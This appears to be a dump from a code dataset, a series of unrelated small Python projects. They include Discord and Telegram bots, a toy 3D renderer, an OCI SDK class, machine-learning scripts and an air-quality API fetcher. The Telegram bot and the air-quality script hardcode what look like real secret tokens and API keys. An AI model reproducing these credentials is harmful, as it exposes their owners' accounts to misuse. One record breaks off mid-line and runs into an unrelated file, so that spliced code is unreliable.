done.\")\n","repo_name":"EdisonChen1024/common_script","sub_path":"python/socket/mysocket_client.py","file_name":"mysocket_client.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21032277386","text":"\"\"\"\nA simple dogfact command.\n\"\"\"\nimport logging\nimport json\nimport requests\nfrom discord.ext import commands\n\nlogger = logging.getLogger(__name__)\n\n\nclass GeneralDogFact(commands.Cog):\n \"\"\"\n # Hits the dogfact API and returns the response.\n \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.slash_command()\n async def dogfact(self, ctx):\n \"\"\"\n Sends a dog fact using an API\n \"\"\"\n logger.info(\"%s used the %s command.\"\n , ctx.author.name\n , ctx.command)\n await ctx.respond(\n json.loads(\n requests.get(\n \"https://dog-api.kinduff.com/api/facts\"\n , timeout=5).text)[\"facts\"][0]\n )\n\n\ndef setup(bot):\n \"\"\"\n Required.\n \"\"\"\n bot.add_cog(GeneralDogFact(bot))\n","repo_name":"practical-python-org/ZorakBot","sub_path":"src/zorak/cogs/general/general_dogfact.py","file_name":"general_dogfact.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"41836823465","text":"import logging\nimport aiohttp\nimport asyncio\nimport time\nfrom aiogram import Bot, Dispatcher, types\nfrom sqlalchemy import create_engine, Column, Integer, String, Float, MetaData\nfrom sqlalchemy.orm import declarative_base, sessionmaker\n\n# Ваш токен телеграм-бота\nTOKEN = \"6597488638:AAGViKDlZ7a2XeoMCHHUuL3kjbhsubrM8Jk\"\n\n# Настройка журнала (логирование)\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n# Глобальные переменные\nCITIES = [\"Москва\", \"Берлин\", \"Лондон\", \"Нью-Йорк\", \"Токио\"]\nWEATHER_CACHE = {}\nDATABASE_URL = \"sqlite:///weather_log.db\"\n\n# Создание базы данных\nBase = declarative_base()\n\n\nclass WeatherLog(Base):\n __tablename__ = 'weather_log'\n id = Column(Integer, primary_key=True, autoincrement=True)\n city = Column(String(50), nullable=False)\n temperature = Column(Float, nullable=False)\n wind_speed = Column(Float, nullable=False)\n wind_direction = Column(String(10), nullable=False)\n precipitation = Column(String(20), nullable=False)\n timestamp = Column(Integer, nullable=False)\n\n\nasync def get_weather_data(city: str):\n if city in WEATHER_CACHE and (WEATHER_CACHE[city][\"timestamp\"] + 600) > time.time():\n return WEATHER_CACHE[city][\"data\"]\n\n base_url = f\"http://127.0.0.1:8000/weather/?city={city}\"\n async with aiohttp.ClientSession() as session:\n async with session.get(base_url) as response:\n if response.status == 200:\n data = await response.json()\n # Кеширование данных о погоде\n WEATHER_CACHE[city] = {\"data\": data, \"timestamp\": time.time()}\n return data\n else:\n return None\n\n return None\n\n\nasync def on_start_command(message: types.Message):\n await message.reply(\"Введите ваш город:\")\n\n\nasync def on_help_command(message: types.Message):\n await message.reply(\"Доступные команды:\\n\"\n \"/help - Вывести список команд\\n\"\n \"/cities - Вывести список доступных городов\\n\"\n \"/start - Начать работу и получить погоду в выбранном городе\")\n\n\nasync def on_cities_command(message: types.Message):\n await message.reply(\"Доступные города:\\n\" + \"\\n\".join(CITIES))\n\n\nasync def on_text_message(message: types.Message):\n user_input = message.text.strip().lower()\n\n if user_input in (city.lower() for city in CITIES):\n city = next(city for city in CITIES if city.lower() == user_input)\n\n # Вызов функции get_weather_data для получения данных о погоде с сервера Django\n weather_data = await get_weather_data(city)\n\n if weather_data:\n # Обработка данных о погоде и отправка ответа пользователю\n temperature = weather_data.get(\"temperature\")\n wind_speed = weather_data.get(\"wind_speed\")\n precipitation = weather_data.get(\"precipitation\")\n\n if temperature is not None and wind_speed is not None and precipitation is not None:\n await message.reply(f\"Вы выбрали город: {city}. Погода в этом городе:\\n\"\n f\"Температура: {temperature}°C\\n\"\n f\"Скорость ветра: {wind_speed} м/с\\n\"\n f\"Осадки: {precipitation}\")\n else:\n await message.reply(\"Извините, данные о погоде для этого города недоступны.\")\n else:\n await message.reply(\"Извините, не удалось получить погодные данные для этого города.\")\n else:\n await message.reply(\"Город не найден. Введите другой город.\")\n\n\nasync def on_unknown_command(message: types.Message):\n await message.reply(\"Неизвестная команда. Введите /help для получения списка команд.\")\n\n\nasync def save_weather_to_database(city: str, weather_data: dict):\n try:\n engine = create_engine(DATABASE_URL)\n Base.metadata.create_all(engine)\n\n Session = sessionmaker(bind=engine)\n session = Session()\n\n weather_log = WeatherLog(city=city,\n temperature=weather_data[\"temperature\"],\n wind_speed=weather_data[\"wind_speed\"],\n wind_direction=weather_data[\"wind_direction\"],\n precipitation=weather_data[\"precipitation\"],\n timestamp=int(time.time()))\n session.add(weather_log)\n session.commit()\n\n except Exception as e:\n logger.error(\"Ошибка сохранения данных о погоде в базу данных: %s\", e)\n session.rollback()\n\n finally:\n session.close()\n\n\nasync def main():\n bot = Bot(token=TOKEN)\n dp = Dispatcher(bot)\n\n dp.register_message_handler(on_start_command, commands=\"start\")\n dp.register_message_handler(on_help_command, commands=\"help\")\n dp.register_message_handler(on_cities_command, commands=\"cities\")\n dp.register_message_handler(on_text_message, content_types=types.ContentType.TEXT)\n dp.register_message_handler(on_unknown_command)\n\n # Запуск бота\n await dp.start_polling()\n\n\nif __name__ == '__main__':\n asyncio.run(main())\n","repo_name":"Kapitan21oo/tz_bot_aiogram","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70599239205","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 31 16:55:09 2021\n\nneed to get colors and shadows working\nfix holes in surfaces\n\n@author: teddyrosenbaum\n\"\"\"\nimport numpy as np\nimport py3dMath as mp\nimport matplotlib.pyplot as plt\n\ndef test():\n \"\"\"\n Description\n --------\n Makes and displays a 3d cube \n \n Input\n ----\n None\n \n Output\n ----\n None\n \n \"\"\"\n w = workSpace()\n w.cameras.append(camera(30,30,100,100,-3,-3,2,-15,45))\n w.lights.append(light(10,-3,-3,2))\n w.addCube(0,0,0,1)\n w.renderCamera(0)\n\ndef makeColor(brightness,color):\n \"\"\"\n Description\n --------\n Makes a shade of a color given a brightness value and a color\n \n Input\n ----\n Double brightness\n Double[] color with RGB color values\n \n Output\n ----\n Double[] with RGB color values\n \n \"\"\"\n maxBrightness = 10\n c = []\n if(brightness >= maxBrightness):\n return [1,1,1]\n for i in color:\n c.append((1/(maxBrightness-brightness) * i) / (1/(maxBrightness-brightness) + 1/(brightness))) #weighted mean with color and black\n return c\n\n \ndef brightness(surface,lights,camera,x,y,z):\n \"\"\"\n Description\n --------\n Returns the brightness value based no relitive angle and distance from all the lights\n \n Input\n ----\n Surface surface \n Light[] lights\n Camera camera\n Doubles x, y, z \n \n Output\n ----\n Double \n \n \"\"\"\n brightness = 1\n v1 = surface.plane.o\n v2 = mp.vector(camera.x - x, camera.y - y, camera.z - z)\n if v1.angle(v2) > 90:\n v1.x = -v1.x\n v1.y = -v1.y\n v1.z = -v1.z\n for i in lights:\n v3 = mp.vector(i.x - x, i.y - y, i.z - z)\n d = mp.pointPointDistance(mp.point(i.x,i.y,i.z),mp.point(x,y,z))\n brightness = brightness + (np.sin(np.pi / 180 * v1.angle(v3)) * i.brightness /(4 * np.pi * d * d))\n return brightness\n\n \nclass workSpace:\n def __init__(self):\n self.cameras = []\n self.lights = []\n self.surfaces = []\n \n def clearSurfaces(self):\n \"\"\"\n Description\n --------\n Removes any surfaces from workSpace\n \n Input\n ----\n None\n \n Output\n ----\n None\n \n \"\"\"\n self.surfaces = []\n \n def renderCamera(self,camIndex):\n \"\"\"\n Description\n --------\n Creates a 3d image from perspective of camera at index camIndex\n \n Input\n ----\n Int camIndex\n \n Output\n ----\n None\n \n \"\"\"\n camera = self.cameras[camIndex]\n ax = plt.gca()\n c = mp.point(camera.x,camera.y,camera.z)\n \n for i in range(camera.pixX):\n for j in range(camera.pixY):\n yaw = ((camera.yaw-camera.angleX/2) + ((camera.angleX * (camera.pixX - i))/camera.pixX)) * np.pi / 180\n pitch = ((camera.pitch-camera.angleY/2) + ((camera.angleY * (j)/camera.pixY))) * np.pi / 180\n l = mp.line(c.x, c.y, c.z, np.cos(yaw), np.sin(yaw), np.tan(pitch)) \n point = []\n index = []\n for k in range(len(self.surfaces)):\n surface = self.surfaces[k]\n p = mp.planeLineIntersect(l,surface.plane)\n if(p != False):\n if(surface.inSurface(p)):\n point.append(p)\n index.append(k)\n '''old could reduce computational demand\n if(mp.pointLineDistance(l,surface.center) <= surface.radius):\n p = mp.planeLineIntersect(l,self.surface.plane)\n if(self.surfaces[k].inSurface(p)):\n point.append(p)\n index.append(i)\n '''\n \n if(len(point) == 0):\n ax.add_patch(plt.Rectangle([i,j], 1, 1, color = [1,1,1]))\n \n else:\n \n minVal = mp.pointPointDistance(c,point[0])\n minValIndex = 0\n for k in range(len(point)):\n distance = mp.pointPointDistance(c,point[k])\n if(minVal >= distance):\n minVal = distance\n minValIndex = k\n #need to add lines to light to add shadows\n surface = self.surfaces[index[minValIndex]]\n #b = brightness(surface,self.lights,camera,point[minValIndex].x,point[minValIndex].y,point[minValIndex].z)\n #ax.add_patch(makePixel(i,j,b,self.surfaces[minValIndex].color))\n ax.add_patch(plt.Rectangle([i,j], 1, 1, color = [0,0,0]))\n plt.axis('scaled')\n plt.axis('off')\n plt.show()\n \n \n \n def addCube(self,x,y,z,size):\n \"\"\"\n Description\n --------\n Adds a cube at location x, y, z with a size of size\n \n Input\n ----\n Doubles x, y, z\n Double size\n \n Output\n ----\n None\n \n \"\"\"\n p1 = mp.point(x,y,z)\n p2 = mp.point(x+size,y,z)\n p3 = mp.point(x,y+size,z)\n p4 = mp.point(x,y,z+size)\n p5 = mp.point(x+size,y+size,z)\n p6 = mp.point(x+size,y,z+size)\n p7 = mp.point(x,y+size,z+size)\n p8 = mp.point(x+size,y+size,z+size)\n self.surfaces.append(surface([0,0,0],[p1,p2,p5,p3])) #z constant\n self.surfaces.append(surface([0,0,0],[p4,p6,p8,p7])) #z constant\n self.surfaces.append(surface([0,0,0],[p1,p2,p6,p4])) #y constant\n self.surfaces.append(surface([0,0,0],[p3,p5,p8,p7])) #y constant\n self.surfaces.append(surface([0,0,0],[p1,p3,p7,p4])) #x constant\n self.surfaces.append(surface([0,0,0],[p2,p5,p8,p6])) #x constant\n \n\nclass light:\n def __init__(self,brightness,x,y,z):\n self.brightness = brightness\n self.x = x\n self.y = y\n self.z = z\n \n\nclass camera:\n def __init__(self,angleX,angleY,pixX,pixY,x,y,z,pitch,yaw):\n self.angleX = angleX\n self.angleY = angleY\n self.pixX = pixX\n self.pixY = pixY\n self.x = x\n self.y = y\n self.z = z\n self.pitch = pitch\n self.yaw = yaw\n \n\nclass surface:\n #all points must be in same plane\n def __init__(self,color,points):\n self.color = color\n self.points = points\n v1 = mp.vector(self.points[1].x - self.points[0].x, self.points[1].y - self.points[0].y, self.points[1].z - self.points[0].z)\n v2 = mp.vector(self.points[1].x - self.points[2].x, self.points[1].y - self.points[2].y, self.points[1].z - self.points[2].z)\n v3 = v1.cross(v2) \n self.plane = mp.plane(v3.x*self.points[0].x+v3.y*self.points[0].y+v3.z*self.points[0].z,v3.x,v3.y,v3.z)\n self.radius = 0 \n self.c = self.center()\n for p in self.points:\n d = mp.pointPointDistance(p,self.c)\n if d > self.radius:\n self.radius = d\n \n \n '''\n def add(self,x,y,z):\n self.x.append(x)\n self.y.append(y)\n self.z.append(z)\n '''\n \n def center(self):\n \"\"\"\n Description\n --------\n Finds the center of surface \n \n Input\n ----\n None\n \n Output\n ----\n Point\n \n \"\"\" \n xtot = 0\n ytot = 0\n ztot = 0\n for i in self.points:\n xtot = xtot + i.x\n ytot = ytot + i.y\n ztot = ztot + i.z\n return mp.point(xtot/len(self.points),ytot/len(self.points),ztot/len(self.points))\n \n def inSurface(self,p):\n \"\"\"\n Description\n --------\n Determines if point p is in surface\n Returns True if it is otherwise returns False\n \n Input\n ----\n Point p\n \n Output\n ----\n Boolean \n \n \"\"\" \n tot = 0\n \n sx = self.points[0].x-self.points[1].x\n sy = self.points[0].y-self.points[1].y\n sz = self.points[0].z-self.points[1].z\n k = (100 * mp.vector(sx,sy,sz).mag())\n p1 = mp.point(p.x+(sx*k*self.radius),p.y+(sy*k*self.radius),p.z+(sz*k*self.radius))\n for i in range(len(self.points)-2):\n if mp.segmentIntersects(p,p1,self.points[i],self.points[i+1]):\n tot = tot + 1\n if mp.segmentIntersects(p,p1,self.points[0],self.points[-1]):\n tot = tot + 1\n '''\n for i in range(len(self.points)-1):\n p1 = self.points[i]\n p2 = self.points[i+1]\n intersect = mp.segmentIntersects(p,self.c,p1,p2)\n if intersect:\n tot = tot + 1\n\n p1 = self.points[0]\n p2 = self.points[-1]\n intersect = mp.segmentIntersects(p,self.c,p1,p2)\n if intersect:\n tot = tot + 1\n\n '''\n \n if tot%2 == 1:\n return True\n return False\n\n","repo_name":"trbaum/3dGameOfLife","sub_path":"py3d.py","file_name":"py3d.py","file_ext":"py","file_size_in_byte":9358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31583509089","text":"from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass Operation(object):\n \"\"\"\n The operation object.\n \"\"\"\n\n #: A constant which can be used with the model_type property of a Operation.\n #: This constant has a value of \"PROCEDURE\"\n MODEL_TYPE_PROCEDURE = \"PROCEDURE\"\n\n #: A constant which can be used with the model_type property of a Operation.\n #: This constant has a value of \"API\"\n MODEL_TYPE_API = \"API\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new Operation object with values from keyword arguments. This class has the following subclasses and if you are using this class as input\n to a service operations then you should favor using a subclass over the base class:\n\n * :class:`~oci.data_integration.models.OperationFromProcedure`\n * :class:`~oci.data_integration.models.OperationFromApi`\n\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param model_type:\n The value to assign to the model_type property of this Operation.\n Allowed values for this property are: \"PROCEDURE\", \"API\"\n :type model_type: str\n\n :param metadata:\n The value to assign to the metadata property of this Operation.\n :type metadata: oci.data_integration.models.ObjectMetadata\n\n \"\"\"\n self.swagger_types = {\n 'model_type': 'str',\n 'metadata': 'ObjectMetadata'\n }\n\n self.attribute_map = {\n 'model_type': 'modelType',\n 'metadata': 'metadata'\n }\n\n self._model_type = None\n self._metadata = None\n\n @staticmethod\n def get_subtype(object_dictionary):\n \"\"\"\n Given the hash representation of a subtype of this class,\n use the info in the hash to return the class of the subtype.\n \"\"\"\n type = object_dictionary['modelType']\n\n if type == 'PROCEDURE':\n return 'OperationFromProcedure'\n\n if type == 'API':\n return 'OperationFromApi'\n else:\n return 'Operation'\n\n @property\n def model_type(self):\n \"\"\"\n **[Required]** Gets the model_type of this Operation.\n The operation type.\n\n Allowed values for this property are: \"PROCEDURE\", \"API\"\n\n\n :return: The model_type of this Operation.\n :rtype: str\n \"\"\"\n return self._model_type\n\n @model_type.setter\n def model_type(self, model_type):\n \"\"\"\n Sets the model_type of this Operation.\n The operation type.\n\n\n :param model_type: The model_type of this Operation.\n :type: str\n \"\"\"\n allowed_values = [\"PROCEDURE\", \"API\"]\n if not value_allowed_none_or_none_sentinel(model_type, allowed_values):\n raise ValueError(\n f\"Invalid value for `model_type`, must be None or one of {allowed_values}\"\n )\n self._model_type = model_type\n\n @property\n def metadata(self):\n \"\"\"\n Gets the metadata of this Operation.\n\n :return: The metadata of this Operation.\n :rtype: oci.data_integration.models.ObjectMetadata\n \"\"\"\n return self._metadata\n\n @metadata.setter\n def metadata(self, metadata):\n \"\"\"\n Sets the metadata of this Operation.\n\n :param metadata: The metadata of this Operation.\n :type: oci.data_integration.models.ObjectMetadata\n \"\"\"\n self._metadata = metadata\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/data_integration/models/operation.py","file_name":"operation.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"30920214268","text":"#!/usr/bin/env python3\nimport sys\nimport requests\nimport json\nfrom math import sqrt\n\nlat1 = float(sys.argv[1])\nlon1 = float(sys.argv[2])\nd = float(sys.argv[3])\nurl = 'http://20.185.44.219:5000'\n# accident_map = []\ni=0\nfor data in sys.stdin:\n obj = json.loads(data)\n lat2 = float(obj['Start_Lat'])\n lon2 = float(obj['Start_Lng'])\n dist = sqrt((lat2-lat1)**2 + (lon2-lon1)**2)\n if dist None:\n X = sorted(list(DATA_ROOT.glob(\"**/*.npz\")))\n if self.use_data_augmentation:\n transform = get_diffusion_transform()\n else:\n transform = None\n\n print(f\"validation image path: {X[-3:]}\")\n\n self.train_dataset = DiffusionDataset(\n path=X[:-3] * self.times, transform=transform, type=self.type\n )\n self.val_dataset = DiffusionDataset(\n path=X[-3:] * 4, type=self.type\n ) # *4 in order to allocate on 4 GPUs\n\n def prepare_data(self, *args, **kwargs):\n # set deterministic training for reproducibility\n random_state = random.randint(0, 100)\n set_determinism(seed=random_state)\n return super().prepare_data(*args, **kwargs)\n\n def train_dataloader(self):\n print(f\"get {len(self.train_dataset)} training 3D image!\")\n return DataLoader(\n self.train_dataset, batch_size=self.batch_size, num_workers=0, shuffle=True\n )\n\n def val_dataloader(self):\n print(f\"get {len(self.val_dataset)} validation 3D image!\")\n return DataLoader(self.val_dataset, batch_size=self.batch_size, num_workers=0)\n\n def test_dataloader(self):\n print(f\"get {len(self.val_dataset)} validation 3D image!\")\n return DataLoader(self.val_dataset, batch_size=1, num_workers=0)\n","repo_name":"stfxecutables/Multichannel-input-pixelwise-regression-u-nets","sub_path":"project/lig_module/data_model_dti.py","file_name":"data_model_dti.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"36548668137","text":"from tensorflow.keras.models import load_model\nimport numpy as np\nimport cv2 as cv\nmodel1=load_model('model.h5')\ncap=cv.VideoCapture(\"lane_vgt.mp4\")\nwhile True:\n ret, frame = cap.read()\n if not ret:\n break\n frame = cv.resize(frame, (192,192))\n frame = frame / 255\n frame = cv.resize(frame,(192,192))\n frame = np.array(frame)\n frame = frame[None, :, :, :]\n mask = model1.predict(frame)\n rem = np.resize(mask, (192, 192, 1))\n rem = rem.astype('float64')\n rem = rem * 255\n rem=np.where(rem>3,255,rem)\n cv.imshow('frame', rem)\n if cv.waitKey(1) == ord('q'):\n break\ncap.release()\ncv.destroyAllWindows()\n","repo_name":"Piyush-M01/MachineLearning","sub_path":"lane/Practise.py","file_name":"Practise.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26621451786","text":"from sklearn.datasets import load_boston\nboston = load_boston()\n\nfrom sklearn.cross_validation import train_test_split\nimport numpy as np\nX = boston.data\ny = boston.target\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size=.25,random_state=33)\n\n#由于数据目标房价之间差异较大,因此需要标准化处理\n# print(np.max(boston.target))\n# print(np.min(boston.target))\n# print(np.mean(boston.target))\n\nfrom sklearn.preprocessing import StandardScaler\nss_X = StandardScaler()\nss_y = StandardScaler()\nX_train = ss_X.fit_transform(X_train)\nX_test = ss_X.transform(X_test)\ny_train = ss_y.fit_transform(y_train)\ny_test = ss_y.transform(y_test)\n\n#使用线性回归模型LinearRegression和SGDRegressor分别对波士顿房价进行预测\nfrom sklearn.linear_model import LinearRegression,SGDRegressor\nlr = LinearRegression()\nlr.fit(X_train,y_train)\nlr_y_pred = lr.predict(X_test)\n\nsgdr = SGDRegressor()\nsgdr.fit(X_train,y_train)\nsgdr_y_pred = sgdr.predict(X_test)\n\n#使用三种回归评价机制以及两种调用R-squared评价模块的方法,对本节模型的回归性能作出评价\n\nprint(\"The value of default measurement of LinearRegression is: \",lr.score(X_test,y_test))\n\nfrom sklearn.metrics import r2_score,mean_squared_error,median_absolute_error\n\n#使用r2_score模块输出评价结果\nprint(\"The value of R-squared of LinearRegression is: \",r2_score(y_test,lr_y_pred))\n\n#使用mean_squared_error模块输出评价结果\n\nprint(\"The mean aquared error of LinearRegression is:\",mean_squared_error(ss_y.inverse_transform(y_test),ss_y.inverse_transform(lr_y_pred)))\n\n#使用median_absolute_error模块输出评价结果\nprint(\"The mean absolute error of LinearRegression is:\",median_absolute_error(ss_y.inverse_transform(y_test),ss_y.inverse_transform(lr_y_pred)))\n\n\n\nprint(\"The value of default measurement of SGDRegressor is: \",sgdr.score(X_test,y_test))\n\n\n#使用r2_score模块输出评价结果\nprint(\"The value of R-squared of SGDRegressor is: \",r2_score(y_test,sgdr_y_pred))\n\n#使用mean_squared_error模块输出评价结果\n\nprint(\"The mean aquared error of SGDRegressor is:\",mean_squared_error(ss_y.inverse_transform(y_test),ss_y.inverse_transform(sgdr_y_pred)))\n\n#使用median_absolute_error模块输出评价结果\nprint(\"The mean absolute error of SGDRegressor is:\",median_absolute_error(ss_y.inverse_transform(y_test),ss_y.inverse_transform(sgdr_y_pred)))\n\n\n","repo_name":"aqc112420/meachine-learning","sub_path":"Machine-learning/ML2Kaggle/Linear-regression.py","file_name":"Linear-regression.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39096765170","text":"import discord\nfrom discord.ext import commands\nimport json\nimport os\nfrom discord_slash import SlashCommand\n\n\ndef getPrefix(client, message):\n with open('prefix.json','r') as f:\n prefixes = json.load(f)\n try:\n return prefixes[str(message.guild.id)]\n except:\n return '-'\n\nclient = commands.Bot(command_prefix=getPrefix,intents=discord.Intents().all(),help_command=None, case_insensitive=True)\nslash = SlashCommand(client, sync_commands=True)\n\nfor filename in os.listdir('./cogs'):\n if filename.endswith('.py'):\n client.load_extension(f'cogs.{filename[:-3]}')\n print(\"Loaded\", filename)\n\n\n# @client.command()\n# async def load(ctx, extension):\n# client.load_extension(f'cogs.{extension}')\n\n# @client.command()\n# async def unload(ctx, extension):\n# client.unload_extension(f'cogs.{extension}')\n\n\n@client.event\nasync def on_ready():\n await client.change_presence(activity=discord.Activity(type=discord.ActivityType.watching,name=\"For -help\"))\n print('-' * 20)\n print(client.user.name, \"is online\")\n print(\"ID:\", client.user.id)\n print('-' * 20)\n\n\nclient.run(os.getenv(\"TOKEN\"))","repo_name":"DannyFS/Dannys-Discord-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17543169761","text":"#! -*- encoding=utf-8 -*-\n# pyhton 中函数的工作原理\nimport inspect\nframe = None\ndef foo():\n bar()\ndef bar():\n global frame\n frame = inspect.currentframe()\n\n'''\npython.exe这个是C语言的解释器。它会用一个叫做PyEval_EvalFramEx的C语言函数\n去执行foo函数,这个函数在运行python的函数的时候,它首先会创建一个栈帧(stack frame)\n这个栈帧实际上是一个上下文,它也是一个对象,体现python一切皆对象,把函数变成字节码对象\n在栈帧对象的上下文里运行函数的字节码,函数字节码全局是唯一的。\n当foo调用子函数bar,又会创建一个栈帧,\n所有的栈帧都是放在堆内存上,而不是放在栈内存上,堆内存有个特性是\n只要你不释放他,他就会一直在我们的内存当中。\n这个特性决定了栈帧可以独立于调用者存在。\n我们调不调用,它都在那儿,只要我们指向它的栈帧就可以控制它,这就意味着我们对函数的控制可以很精确\n\n'''\n# 我们用dis可以产看字节码是什么样的\nimport dis\nprint(dis.dis(foo))\nfoo()\n# 函数运行完成\nprint(frame.f_code.co_name) # 拿到定义地方的函数的栈帧\ncaller_frame = frame.f_back # 拿到调用地方的函数的栈帧\nprint(caller_frame.f_code.co_name)\nprint('*' * 80)\n'''\n以上过程我们可以看到,虽然foo函数运行完成,我们依然可以拿到函数的栈帧\n这和静态语言不一样,静态语言函数调用的时候是一个栈的形式,函数调用完了,\n整个栈就销毁了。\n整个函数调用类似一个递归操作:\n调用foo时,创建一个栈帧,调用bar时,又创建一个栈帧\n栈帧对象:\nf_back -> 该函数调用者的栈帧对象\nf_code -> 该函数字节码对象PyCodeObject\n'''\ndef gen_func():\n yield 1\n name = \"fzk\"\n age = 27\n yield 44\n birthday = \"19920825\"\n return \"yuner\"\n'''\npyhton编译函数字节码的时候会发现yield关键词,他就知道这不是一个普通函数,\n而是一个生成器函数,他会生成一个标记标记这个函数,当我们来调用这个函数的时候,\n他就会返回一个生成器对象,这个生成器对象对pyFrameObject栈帧对象做了一个封装。\n这个生成器对象是这样的:\n[Heap memory 堆内存]\nPyGenObject:\ngi_frame\ngi_code\n\ngi_frame -> PyFrameObject(和上面的不太一样): f_lasti(指向我们最近执行函数代码的字节码的位置) 和 f_locals(拿到最后一次yield前的所有赋值操作的字典)\ngi_code -> PyCodeObject: gen_fn's bytecode\n'''\ngen = gen_func()\nprint(dis.dis(gen))\nprint('*'* 80)\nprint(gen.gi_frame.f_lasti)\nprint(gen.gi_frame.f_locals)\nnext(gen)\nprint(gen.gi_frame.f_lasti)\nprint(gen.gi_frame.f_locals)\nnext(gen)\nprint(gen.gi_frame.f_lasti)\nprint(gen.gi_frame.f_locals)\n# next(gen)\n# print(gen.gi_frame.f_lasti)\n# print(gen.gi_frame.f_locals)\n\n# list使用c语言实现的,看不到源码,而且做了很多优化,很多方法不允许我们覆盖\n# 可以研究下UserList,所以写自己的list的时候可以继承UserList,我们可以自定义\nfrom collections import UserList\n'''\nUserList 继承MutableSequence,\nMutableSequence继承自Sequence\nSequence里面的__iter__方法源码如下:\ndef __iter__(self):\n i = 0\n try:\n while True:\n v = self[i]\n yield v\n i += 1\n except IndexError:\n return\n\ni 记录了数组里的位置\nself[i] 则会调用sequence的__getitem__方法\n'''","repo_name":"wnz27/Coding-Daily","sub_path":"content/Python_Generate/迭代器和生成器/how_gen_work.py","file_name":"how_gen_work.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3945287185","text":"#!/usr/bin/env python3\n\nimport re\nfrom z3 import *\n\npoints = set()\nradii = {}\nwith open(\"input.txt\") as f:\n for line in f:\n x, y, z, r = map(int, re.findall(\"-?[0-9]+\", line))\n point = (x, y, z)\n points.add(point)\n radii[point] = r\n\n\ndef zabs(x):\n return If(x >= 0, x, -x)\n\n\ndef zdist(a, b):\n \"a, b :: (x, y z)\"\n return zabs(a[0] - b[0]) + zabs(a[1] - b[1]) + zabs(a[2] - b[2])\n\n\ndef dist(a, b):\n \"a, b :: (x, y z)\"\n return abs(a[0] - b[0]) + abs(a[1] - b[1]) + abs(a[2] - b[2])\n\n\nx, y, z = Ints(\"x y z\") # variable coord\npt = (x, y, z)\n\no = Optimize()\nin_range = Int(\"in_range\")\nin_range = x * 0\nfor point in points:\n in_range += If(zdist(pt, point) <= radii[point], 1, 0)\n\nnum_in_range = Int(\"num_in_range\")\no.add(num_in_range == in_range)\no.maximize(num_in_range)\no.check()\n\nmodel = o.model()\nbest = model[x].as_long(), model[y].as_long(), model[z].as_long()\nprint(dist((0, 0, 0), best))\n","repo_name":"mtn/advent18","sub_path":"day23/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32946868521","text":"import sys\nimport requests\nfrom random import randint\nfrom utils.net import create_net, net_by_quantity\nfrom shapely import geometry\nimport geopandas as gpd\nimport json\n\nGEOM_COLUMN = 'geometry'\n\n\nclass AirConditionGetter:\n \"\"\"\n For more info about API go here:\n https://breezometer.com/air-quality-api/\n \"\"\"\n\n API_PATH = \"https://api.breezometer.com/baqi/\"\n\n API_KEYS = [\n \"44454c79cdcb4a409f0f852f76b22c54\",\n \"194734dfed444b2b97e397498e434a85\",\n \"441aacba5c4f4c2385b74483bd59a8ec\",\n \"60babde2ae614606bb60623843867136\",\n \"186a594cfae44136b7ce52bddac4b4a7\"\n ]\n\n NET_STEP = 0.01\n MAX_QTY = 36\n\n def get_df(self, lng1, lat1, lng2, lat2):\n net = create_net(lng1, lat1, lng2, lat2, self.NET_STEP)\n if len(net) > self.MAX_QTY:\n net = net_by_quantity(lng1, lat1, lng2, lat2, self.MAX_QTY)\n data = []\n for coordinates in net:\n api_key_for_request = AirConditionGetter.API_KEYS[randint(0, len(AirConditionGetter.API_KEYS) - 1)]\n\n response = requests.get(\n AirConditionGetter.API_PATH,\n [\n (\"lon\", coordinates[0]),\n (\"lat\", coordinates[1]),\n (\"key\", api_key_for_request),\n (\"fields\", \"breezometer_aqi\")\n ]\n )\n\n data.append({\n GEOM_COLUMN: geometry.Point(coordinates[0], coordinates[1]),\n \"aqi\": json.loads(response.text)['breezometer_aqi']\n })\n\n return gpd.GeoDataFrame(data, geometry=GEOM_COLUMN)\n\n\nif __name__ == '__main__':\n ac = AirConditionGetter()\n bbox = map(float, sys.argv[1:])\n\n result = ac.get_df(*bbox)\n\n with open('out.json', 'w') as f:\n r = json.dumps(result)\n 